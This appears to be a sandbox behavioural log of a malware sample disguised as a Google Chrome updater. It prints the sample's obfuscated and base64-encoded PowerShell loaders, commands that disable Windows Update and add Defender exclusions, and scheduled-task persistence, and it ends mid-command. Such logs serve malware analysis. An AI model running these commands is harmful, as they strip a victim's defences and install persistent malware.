C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHAAdwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAaQB0ACMAPgA="2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "fotenqffsdg"4⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe yggqxvaxzgtmmnu0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeuUnLsXDD9UtB3flETOPTJSsx1RTbkWA+xUUHWbk5tS/88kiBjzOWROcItZCa19YzWwG294PvSGFl3hPGA5ZbwU+pcVLBqbqLOnV4zWU4lY2wH0ZELAHdkWrYk+7ENXoQziO22V6ckhOxPyaVs82YN/9a3ifTAItYOFArt4U3K6bB7F90lVvq7QwQhNo6tEAC6/qeiMZE1q08X0nwcXGWB+0u4suIL4Z4DCAa054zZutth0rng4GR/dXCbKfw/lYkNtdAcXMzX35twOSggH5Co4UwheW366ng+FuqhYrupWviHg3nrTWKYKFV/Z9VkRc5QPFZo8S1u8KUaN/9+FCfaV9FnY0PiGQClhwUH1x4ZHMgCHvbtTfAQZnZ6PHdhTedfzPc/1b6jDZTt2gLFGVUTpdjtbd0A7HbKxciS2G9ds3BAn0dJexxAf2Br8df8B/KEwKMJ+loEE6uuE26u2HGWPzuqaI7RLAlHRh9CoJI1+I=4⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe yggqxvaxzgtmmnu1 XofLACsdV31j9ZQMDeZoqCpNDgH0IbRDCo8NYw9+P4ISyhmBaEKZj/pCrFzqeglJuGJVePitxQ1seLOAXl7jWWqXK+zOrqa2LmfHXb1cPkhd1J50U99RQ61Gyog4XK27/XTKo0f9OmcXDDPP9C48Ue7GZsz87KETDZ5qD/Yaq1lB35GEx/fRQAGrjdVEa0u7JPhfVtNRFtP1XBlwVUEgxsufEEfeQMI5wTmbbTssPqyRBa9iiWu+72oSNhkbSwWZcuQ2UAgyeaUjxbtJ0D2znd9Y++tdpAWuo5aLo0IzHXZhNVbYmhUQJYD+wnHENe+14/exahTwHPq/jdb503ZCEWJvf3Rvhi52ecxgli8y+ICndzv7ONBqBKvBj1Mu1X47SAlkpCck5/xJqFvaPG5cIq3h/y80diKSbPokVDWnEa/rMyTVTPRzyu+sagweTAfH7BqvN6UeRhHhphz3iAeobA==4⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3388 -s 7322⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 484 -p 3388 -ip 33882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 472 -p 3280 -ip 32802⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3280 -s 9522⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe"C:\Users\Admin\AppData\Local\Temp\16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe"2⤵
- Drops file in Drivers directory
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYwB4AG4AIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABBAEEAZAB3AEEAagBBAEQANABBAEkAQQBCAFQAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEATABRAEIAUQBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBBAEEATABRAEIARwBBAEcAawBBAGIAQQBCAGwAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAEkAQQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBjAEEARQBNAEEAYQBBAEIAeQBBAEcAOABBAGIAUQBCAGwAQQBGAHcAQQBkAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAdABBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBJAEEAQgBTAEEASABVAEEAYgBnAEIAQgBBAEgATQBBAEkAQQBBADgAQQBDAE0AQQBhAFEAQgAwAEEAQwBNAEEAUABnAEEAPQAiACcAKQAgADwAIwB6AHIAbABtACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAdwBzACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAZQB1AHEAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBpAGEAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAxADYANgA5ADEAYQAwADIANgAwADAAMgA5ADgAMABjADEAZgBhAGMANAAyADgANgAxADAAZAA3ADMAYwBhADkANgAzADgANAAyADAAZAAyAGUAMwBmAGEANwA5AGMAOABkADEAYQA4ADIAOAA0ADMAOAA4AGUAZQAzADAANwBiAC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAbwB1ACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVAB